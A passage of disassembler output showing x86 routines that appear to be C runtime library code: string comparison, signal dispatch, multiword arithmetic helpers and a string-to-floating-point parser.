loc_434F18: ; CODE XREF: sub_434DF9+27�j
; sub_434DF9+3D�j
mov eax, ebx
loc_434F1A: ; CODE XREF: sub_434DF9+11D�j
pop esi
pop ebx
leave
retn
sub_434DF9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz loc_43501A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
lea eax, dword_6769A0
cmp dword ptr [eax+8], 0
jnz short loc_434F91
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_434F4C: ; CODE XREF: .text:00434F73�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_434F75
or al, al
jz short loc_434F75
inc esi
inc edi
cmp ah, bh
jb short loc_434F64
cmp ah, bl
ja short loc_434F64
add ah, dh
loc_434F64: ; CODE XREF: .text:00434F5C�j
; .text:00434F60�j
cmp al, bh
jb short loc_434F6E
cmp al, bl
ja short loc_434F6E
add al, dh
loc_434F6E: ; CODE XREF: .text:00434F66�j
; .text:00434F6A�j
cmp ah, al
jnz short loc_434F7F
dec ecx
jnz short loc_434F4C
loc_434F75: ; CODE XREF: .text:00434F52�j
; .text:00434F56�j
xor ecx, ecx
cmp ah, al
jz loc_43501A
loc_434F7F: ; CODE XREF: .text:00434F70�j
mov ecx, 0FFFFFFFFh
jb loc_43501A
neg ecx
jmp loc_43501A
; ---------------------------------------------------------------------------
loc_434F91: ; CODE XREF: .text:00434F41�j
lock inc dword_676EDC
cmp dword_676ED8, 0
jg short loc_434FA5
push 0
jmp short loc_434FBE
; ---------------------------------------------------------------------------
loc_434FA5: ; CODE XREF: .text:00434F9F�j
lock dec dword_676EDC
mov ebx, ecx
push 13h
call sub_42DAEF
mov dword ptr [esp], 1
mov ecx, ebx
loc_434FBE: ; CODE XREF: .text:00434FA3�j
xor eax, eax
xor ebx, ebx
mov edi, edi
loc_434FC4: ; CODE XREF: .text:00434FED�j
mov al, [esi]
or eax, eax
mov bl, [edi]
jz short loc_434FEF
or ebx, ebx
jz short loc_434FEF
inc esi
inc edi
push ecx
push eax
push ebx
call sub_43059D
mov ebx, eax
add esp, 4
call sub_43059D
add esp, 4
pop ecx
cmp eax, ebx
jnz short loc_434FF5
dec ecx
jnz short loc_434FC4
loc_434FEF: ; CODE XREF: .text:00434FCA�j
; .text:00434FCE�j
xor ecx, ecx
cmp eax, ebx
jz short loc_434FFE
loc_434FF5: ; CODE XREF: .text:00434FEA�j
mov ecx, 0FFFFFFFFh
jb short loc_434FFE
neg ecx
loc_434FFE: ; CODE XREF: .text:00434FF3�j
; .text:00434FFA�j
pop eax
or eax, eax
jnz short loc_43500C
lock dec dword_676EDC
jmp short loc_43501A
; ---------------------------------------------------------------------------
loc_43500C: ; CODE XREF: .text:00435001�j
mov ebx, ecx
push 13h
call sub_42DB50
add esp, 4
mov ecx, ebx
loc_43501A: ; CODE XREF: .text:00434F2B�j
; .text:00434F79�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435021 proc near ; CODE XREF: sub_431BCC+3154�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
dec eax
push ebx
push esi
dec eax
push edi
jz short loc_43509C
dec eax
dec eax
jz short loc_43507F
sub eax, 4
jz short loc_43507F
sub eax, 3
jz short loc_43507F
sub eax, 4
jz short loc_435072
loc_435048: ; DATA XREF: .text:0043DA68�o
sub eax, 6
jz short loc_435065
dec eax
jz short loc_435058
or eax, 0FFFFFFFFh
jmp loc_43519E
; ---------------------------------------------------------------------------
loc_435058: ; CODE XREF: sub_435021+2D�j
mov ebx, dword_676C80
mov edi, offset dword_676C80
jmp short loc_4350A7
; ---------------------------------------------------------------------------
loc_435065: ; CODE XREF: sub_435021+2A�j
mov ebx, dword_676C7C
mov edi, offset dword_676C7C
jmp short loc_4350A7
; ---------------------------------------------------------------------------
loc_435072: ; CODE XREF: sub_435021+25�j
mov ebx, dword_676C84
mov edi, offset dword_676C84
jmp short loc_4350A7
; ---------------------------------------------------------------------------
loc_43507F: ; CODE XREF: sub_435021+16�j
; sub_435021+1B�j ...
call sub_42E4EE
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_4351A3
mov edi, eax
pop ecx
add edi, 8
pop ecx
mov ebx, [edi]
jmp short loc_4350B9
; ---------------------------------------------------------------------------
loc_43509C: ; CODE XREF: sub_435021+12�j
mov ebx, dword_676C78
mov edi, offset dword_676C78
loc_4350A7: ; CODE XREF: sub_435021+42�j
; sub_435021+4F�j ...
push 1
mov [ebp+var_4], 1
call sub_42DAEF
mov esi, [ebp+arg_0]
pop ecx
loc_4350B9: ; CODE XREF: sub_435021+79�j
cmp ebx, 1
jnz short loc_4350D4
cmp [ebp+var_4], 0
jz loc_43519C
push ebx
call sub_42DB50
pop ecx
jmp loc_43519C
; ---------------------------------------------------------------------------
loc_4350D4: ; CODE XREF: sub_435021+9B�j
xor ecx, ecx
cmp ebx, ecx
jnz short loc_4350EE
cmp [ebp+var_4], ecx
jz short loc_4350E7
push 1
call sub_42DB50
pop ecx
loc_4350E7: ; CODE XREF: sub_435021+BC�j
push 3
call sub_430B45
loc_4350EE: ; CODE XREF: sub_435021+B7�j
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_435100
cmp eax, 0Bh
jz short loc_435100
cmp eax, 4
jnz short loc_43511B
loc_435100: ; CODE XREF: sub_435021+D3�j
; sub_435021+D8�j
mov edx, [esi+54h]
cmp eax, 8
mov [ebp+var_8], edx
mov [esi+54h], ecx
jnz short loc_435157
mov edx, [esi+58h]
mov dword ptr [esi+58h], 8Ch
mov [ebp+var_C], edx
loc_43511B: ; CODE XREF: sub_435021+DD�j
cmp eax, 8
jnz short loc_435157
mov ecx, dword_4538B0
mov eax, dword_4538B4
add eax, ecx
cmp ecx, eax
jge short loc_435159
lea eax, [ecx+ecx*2]
shl eax, 2
loc_435137: ; CODE XREF: sub_435021+132�j
mov edx, [esi+50h]
add eax, 0Ch
and dword ptr [edx+eax-4], 0
mov edx, dword_4538B0
mov edi, dword_4538B4
inc ecx
add edi, edx
cmp ecx, edi
jl short loc_435137
jmp short loc_435159
; ---------------------------------------------------------------------------
loc_435157: ; CODE XREF: sub_435021+EB�j
; sub_435021+FD�j
mov [edi], ecx
loc_435159: ; CODE XREF: sub_435021+10E�j
; sub_435021+134�j
cmp [ebp+var_4], 0
jz short loc_435167
push 1
call sub_42DB50
pop ecx
loc_435167: ; CODE XREF: sub_435021+13C�j
cmp [ebp+arg_0], 8
jnz short loc_435178
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
pop ecx
jmp short loc_43518A
; ---------------------------------------------------------------------------
loc_435178: ; CODE XREF: sub_435021+14A�j
push [ebp+arg_0]
call ebx
cmp [ebp+arg_0], 0Bh
pop ecx
jz short loc_43518A
cmp [ebp+arg_0], 4
jnz short loc_43519C
loc_43518A: ; CODE XREF: sub_435021+155�j
; sub_435021+161�j
mov eax, [ebp+var_8]
cmp [ebp+arg_0], 8
mov [esi+54h], eax
jnz short loc_43519C
mov eax, [ebp+var_C]
mov [esi+58h], eax
loc_43519C: ; CODE XREF: sub_435021+A1�j
; sub_435021+AE�j ...
xor eax, eax
loc_43519E: ; CODE XREF: sub_435021+32�j
pop edi
pop esi
pop ebx
leave
retn
sub_435021 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4351A3 proc near ; CODE XREF: sub_435021+6B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_4538BC
push esi
mov esi, [esp+4+arg_0]
cmp [edx+4], esi
push edi
mov eax, edx
jz short loc_4351CC
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_4351C0: ; CODE XREF: sub_4351A3+27�j
add eax, 0Ch
cmp eax, edi
jnb short loc_4351CC
cmp [eax+4], esi
jnz short loc_4351C0
loc_4351CC: ; CODE XREF: sub_4351A3+15�j
; sub_4351A3+22�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_4351DB
cmp [eax+4], esi
jz short loc_4351DD
loc_4351DB: ; CODE XREF: sub_4351A3+31�j
xor eax, eax
loc_4351DD: ; CODE XREF: sub_4351A3+36�j
pop edi
pop esi
retn
sub_4351A3 endp
; =============== S U B R O U T I N E =======================================
sub_4351E0 proc near ; CODE XREF: sub_434179+2B�p
; sub_434179+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_4351F6
cmp ecx, esi
jnb short loc_4351F9
loc_4351F6: ; CODE XREF: sub_4351E0+10�j
push 1
pop eax
loc_4351F9: ; CODE XREF: sub_4351E0+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_4351E0 endp
; =============== S U B R O U T I N E =======================================
sub_435201 proc near ; CODE XREF: sub_4352BA+40�p
; sub_4352BA+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_4351E0
add esp, 0Ch
test eax, eax
jz short loc_435233
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_4351E0
add esp, 0Ch
test eax, eax
jz short loc_435233
inc dword ptr [esi+8]
loc_435233: ; CODE XREF: sub_435201+19�j
; sub_435201+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_4351E0
add esp, 0Ch
test eax, eax
jz short loc_43524B
inc dword ptr [esi+8]
loc_43524B: ; CODE XREF: sub_435201+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_4351E0
add esp, 0Ch
pop edi
pop esi
retn
sub_435201 endp
; =============== S U B R O U T I N E =======================================
sub_43525F proc near ; CODE XREF: sub_4352BA+30�p
; sub_4352BA+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_43525F endp
; =============== S U B R O U T I N E =======================================
sub_43528D proc near ; CODE XREF: sub_435852+1C8�p
; sub_436034+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_43528D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4352BA proc near ; CODE XREF: sub_435381+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_43532E
push edi
mov [ebp+arg_8], eax
loc_4352E1: ; CODE XREF: sub_4352BA+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_43525F
push ebx
call sub_43525F
lea eax, [ebp+var_10]
push eax
push ebx
call sub_435201
push ebx
call sub_43525F
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_435201
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_4352E1
xor edx, edx
pop edi
loc_43532E: ; CODE XREF: sub_4352BA+21�j
; sub_4352BA+9F�j
cmp [ebx+8], edx
jnz short loc_43535B
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_43532E
; ---------------------------------------------------------------------------
loc_43535B: ; CODE XREF: sub_4352BA+77�j
mov esi, 8000h
loc_435360: ; CODE XREF: sub_4352BA+B9�j
test [ebx+8], esi
jnz short loc_435375
push ebx
call sub_43525F
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_435360
; ---------------------------------------------------------------------------
loc_435375: ; CODE XREF: sub_4352BA+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_4352BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435381 proc near ; CODE XREF: sub_4344C2+17�p
; sub_4344EF+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_4353BC: ; CODE XREF: sub_435381+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_4353D2
cmp cl, 9
jz short loc_4353D2
cmp cl, 0Ah
jz short loc_4353D2
cmp cl, 0Dh
jnz short loc_4353D5
loc_4353D2: ; CODE XREF: sub_435381+40�j
; sub_435381+45�j ...
inc edi
jmp short loc_4353BC
; ---------------------------------------------------------------------------
loc_4353D5: ; CODE XREF: sub_435381+4F�j
push 4
pop esi
loc_4353D8: ; CODE XREF: sub_435381+AE�j
; sub_435381+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_43565B ; default
; jumptable 004353E4 case 10
jmp off_435822[eax*4] ; switch jump
loc_4353EB: ; DATA XREF: .text:off_435822�o
cmp bl, 31h ; jumptable 004353E4 case 0
jl short loc_4353FC
cmp bl, 39h
jg short loc_4353FC
loc_4353F5: ; CODE XREF: sub_435381+C4�j
; sub_435381+118�j
push 3
jmp loc_435619
; ---------------------------------------------------------------------------
loc_4353FC: ; CODE XREF: sub_435381+6D�j
; sub_435381+72�j
cmp bl, byte_4535C8
jnz short loc_43540B
loc_435404: ; CODE XREF: sub_435381+124�j
push 5
jmp loc_435651
; ---------------------------------------------------------------------------
loc_43540B: ; CODE XREF: sub_435381+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_435431
dec eax
dec eax
jz short loc_435425
sub eax, 3
jnz loc_4356F4
jmp loc_4354B4
; ---------------------------------------------------------------------------
loc_435425: ; CODE XREF: sub_435381+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_4353D8
; ---------------------------------------------------------------------------
loc_435431: ; CODE XREF: sub_435381+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_4353D8
; ---------------------------------------------------------------------------
loc_43543A: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp bl, 31h ; jumptable 004353E4 case 1
mov [ebp+var_10], edx
jl short loc_435447
cmp bl, 39h
jle short loc_4353F5
loc_435447: ; CODE XREF: sub_435381+BF�j
cmp bl, byte_4535C8
jz loc_43550F
cmp bl, 2Bh
jz short loc_435489
cmp bl, 2Dh
jz short loc_435489
cmp bl, 30h
jz short loc_4354B4
loc_435462: ; CODE XREF: sub_435381+207�j
cmp bl, 43h
jle loc_4356F4
cmp bl, 45h
jle short loc_435482
cmp bl, 63h
jle loc_4356F4
cmp bl, 65h
jg loc_4356F4
loc_435482: ; CODE XREF: sub_435381+ED�j
push 6
jmp loc_435651
; ---------------------------------------------------------------------------
loc_435489: ; CODE XREF: sub_435381+D5�j
; sub_435381+DA�j ...
dec edi
push 0Bh
jmp loc_435651
; ---------------------------------------------------------------------------
loc_435491: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp bl, 31h ; jumptable 004353E4 case 2
jl short loc_43549F
cmp bl, 39h
jle loc_4353F5
loc_43549F: ; CODE XREF: sub_435381+113�j
cmp bl, byte_4535C8
jz loc_435404
cmp bl, 30h
jnz loc_435669
loc_4354B4: ; CODE XREF: sub_435381+9F�j
; sub_435381+DF�j
mov eax, edx
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_4354BB: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
mov [ebp+var_10], edx ; jumptable 004353E4 case 3
loc_4354BE: ; CODE XREF: sub_435381+184�j
cmp dword_4535C4, edx
jle short loc_4354D7
movzx eax, bl
push esi
push eax
call sub_42F12B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4354E5
; ---------------------------------------------------------------------------
loc_4354D7: ; CODE XREF: sub_435381+143�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4354E5: ; CODE XREF: sub_435381+154�j
test eax, eax
jz short loc_435507
cmp [ebp+var_4], 19h
jnb short loc_4354FF
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_435502
; ---------------------------------------------------------------------------
loc_4354FF: ; CODE XREF: sub_435381+16C�j
inc [ebp+var_8]
loc_435502: ; CODE XREF: sub_435381+17C�j
mov bl, [edi]
inc edi
jmp short loc_4354BE
; ---------------------------------------------------------------------------
loc_435507: ; CODE XREF: sub_435381+166�j
cmp bl, byte_4535C8
jnz short loc_435576
loc_43550F: ; CODE XREF: sub_435381+CC�j
mov eax, esi
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_435516: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp [ebp+var_4], 0 ; jumptable 004353E4 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_43552F
loc_435522: ; CODE XREF: sub_435381+1AC�j
cmp bl, 30h
jnz short loc_43552F
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_435522
; ---------------------------------------------------------------------------
loc_43552F: ; CODE XREF: sub_435381+19F�j
; sub_435381+1A4�j ...
cmp dword_4535C4, edx
jle short loc_435548
movzx eax, bl
push esi
push eax
call sub_42F12B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_435556
; ---------------------------------------------------------------------------
loc_435548: ; CODE XREF: sub_435381+1B4�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_435556: ; CODE XREF: sub_435381+1C5�j
test eax, eax
jz short loc_435576
cmp [ebp+var_4], 19h
jnb short loc_435571
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_435571: ; CODE XREF: sub_435381+1DD�j
mov bl, [edi]
inc edi
jmp short loc_43552F
; ---------------------------------------------------------------------------
loc_435576: ; CODE XREF: sub_435381+18C�j
; sub_435381+1D7�j
cmp bl, 2Bh
jz loc_435489
cmp bl, 2Dh
jz loc_435489
jmp loc_435462
; ---------------------------------------------------------------------------
loc_43558D: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp dword_4535C4, edx ; jumptable 004353E4 case 5
mov [ebp+var_24], edx
jle short loc_4355A9
movzx eax, bl
push esi
push eax
call sub_42F12B
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4355B7
; ---------------------------------------------------------------------------
loc_4355A9: ; CODE XREF: sub_435381+215�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4355B7: ; CODE XREF: sub_435381+226�j
test eax, eax
jz loc_435669
mov eax, esi
jmp short loc_43561A
; ---------------------------------------------------------------------------
loc_4355C3: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
lea ecx, [edi-2] ; jumptable 004353E4 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_4355D3
cmp bl, 39h
jle short loc_435617
loc_4355D3: ; CODE XREF: sub_435381+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_43564F
dec eax
dec eax
jz short loc_435643
sub eax, 3
jnz loc_4356F7
loc_4355E8: ; CODE XREF: sub_435381+2A4�j
push 8
jmp short loc_435651
; ---------------------------------------------------------------------------
loc_4355EC: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
mov [ebp+var_20], edx ; jumptable 004353E4 case 8
loc_4355EF: ; CODE XREF: sub_435381+276�j
cmp bl, 30h
jnz short loc_4355F9
mov bl, [edi]
inc edi
jmp short loc_4355EF
; ---------------------------------------------------------------------------
loc_4355F9: ; CODE XREF: sub_435381+271�j
cmp bl, 31h
jl loc_4356F4
cmp bl, 39h
jg loc_4356F4
jmp short loc_435617
; ---------------------------------------------------------------------------
loc_43560D: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp bl, 31h ; jumptable 004353E4 case 7
jl short loc_435620
cmp bl, 39h
jg short loc_435620
loc_435617: ; CODE XREF: sub_435381+250�j
; sub_435381+28A�j
push 9
loc_435619: ; CODE XREF: sub_435381+76�j
pop eax
loc_43561A: ; CODE XREF: sub_435381+240�j
dec edi
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_435620: ; CODE XREF: sub_435381+28F�j
; sub_435381+294�j
cmp bl, 30h
jnz short loc_435669
jmp short loc_4355E8
; ---------------------------------------------------------------------------
loc_435627: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
cmp [ebp+arg_18], 0 ; jumptable 004353E4 case 11
jz short loc_435657
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_43564F
dec eax
dec eax
jnz loc_4356F7
loc_435643: ; CODE XREF: sub_435381+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_43564F: ; CODE XREF: sub_435381+258�j
; sub_435381+2B8�j
push 7
loc_435651: ; CODE XREF: sub_435381+85�j
; sub_435381+103�j ...
pop eax
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_435657: ; CODE XREF: sub_435381+2AA�j
push 0Ah
dec edi
pop eax
loc_43565B: ; CODE XREF: sub_435381+5D�j
; sub_435381+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 004353E4 case 10
jz loc_4356F9
jmp loc_4353D8
; ---------------------------------------------------------------------------
loc_435669: ; CODE XREF: sub_435381+12D�j
; sub_435381+238�j ...
mov edi, [ebp+arg_8]
jmp loc_4356F9
; ---------------------------------------------------------------------------
loc_435671: ; CODE XREF: sub_435381+63�j
; DATA XREF: .text:off_435822�o
mov [ebp+var_20], 1 ; jumptable 004353E4 case 9
xor esi, esi
loc_43567A: ; CODE XREF: sub_435381+339�j
cmp dword_4535C4, 1
jle short loc_435692
movzx eax, bl
push 4
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_4356A1
; ---------------------------------------------------------------------------
loc_435692: ; CODE XREF: sub_435381+300�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4356A1: ; CODE XREF: sub_435381+30F�j
test eax, eax
jz short loc_4356C1
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_4356BC
mov bl, [edi]
inc edi
jmp short loc_43567A
; ---------------------------------------------------------------------------
loc_4356BC: ; CODE XREF: sub_435381+334�j
mov esi, 1451h
loc_4356C1: ; CODE XREF: sub_435381+322�j
mov [ebp+var_1C], esi
loc_4356C4: ; CODE XREF: sub_435381+371�j
cmp dword_4535C4, 1
jle short loc_4356DC
movzx eax, bl
push 4
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_4356EB
; ---------------------------------------------------------------------------
loc_4356DC: ; CODE XREF: sub_435381+34A�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4356EB: ; CODE XREF: sub_435381+359�j
test eax, eax
jz short loc_4356F4
mov bl, [edi]
inc edi
jmp short loc_4356C4
; ---------------------------------------------------------------------------
loc_4356F4: ; CODE XREF: sub_435381+99�j
; sub_435381+E4�j ...
dec edi
jmp short loc_4356F9
; ---------------------------------------------------------------------------
loc_4356F7: ; CODE XREF: sub_435381+261�j
; sub_435381+2BC�j
mov edi, ecx
loc_4356F9: ; CODE XREF: sub_435381+2DD�j
; sub_435381+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_4357E1
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_435725
cmp [ebp+var_45], 5
jl short loc_435719
inc [ebp+var_45]
loc_435719: ; CODE XREF: sub_435381+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_435728
; ---------------------------------------------------------------------------
loc_435725: ; CODE XREF: sub_435381+38D�j
mov eax, [ebp+var_C]
loc_435728: ; CODE XREF: sub_435381+3A2�j
cmp [ebp+var_4], 0
jbe loc_4357D7
loc_435732: ; CODE XREF: sub_435381+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_435740
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_435732
; ---------------------------------------------------------------------------
loc_435740: ; CODE XREF: sub_435381+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_4352BA
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_43575F
neg eax
loc_43575F: ; CODE XREF: sub_435381+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_43576A
add eax, [ebp+arg_10]
loc_43576A: ; CODE XREF: sub_435381+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_435772
sub eax, [ebp+arg_14]
loc_435772: ; CODE XREF: sub_435381+3EC�j
cmp eax, 1450h
jle short loc_4357A9
mov [ebp+var_2C], 1
loc_435780: ; CODE XREF: sub_435381+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_43578C: ; CODE XREF: sub_435381+454�j
; sub_435381+45E�j
cmp [ebp+var_2C], 0
jz short loc_4357F2
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_435807
; ---------------------------------------------------------------------------
loc_4357A9: ; CODE XREF: sub_435381+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_4357B9
mov [ebp+var_30], 1
jmp short loc_435780
; ---------------------------------------------------------------------------
loc_4357B9: ; CODE XREF: sub_435381+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_436254
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_43578C
; ---------------------------------------------------------------------------
loc_4357D7: ; CODE XREF: sub_435381+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_43578C
; ---------------------------------------------------------------------------
loc_4357E1: ; CODE XREF: sub_435381+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_435807
; ---------------------------------------------------------------------------
loc_4357F2: ; CODE XREF: sub_435381+40F�j
cmp [ebp+var_30], 0
jz short loc_435807
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_435807: ; CODE XREF: sub_435381+426�j
; sub_435381+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_435381 endp
; ---------------------------------------------------------------------------
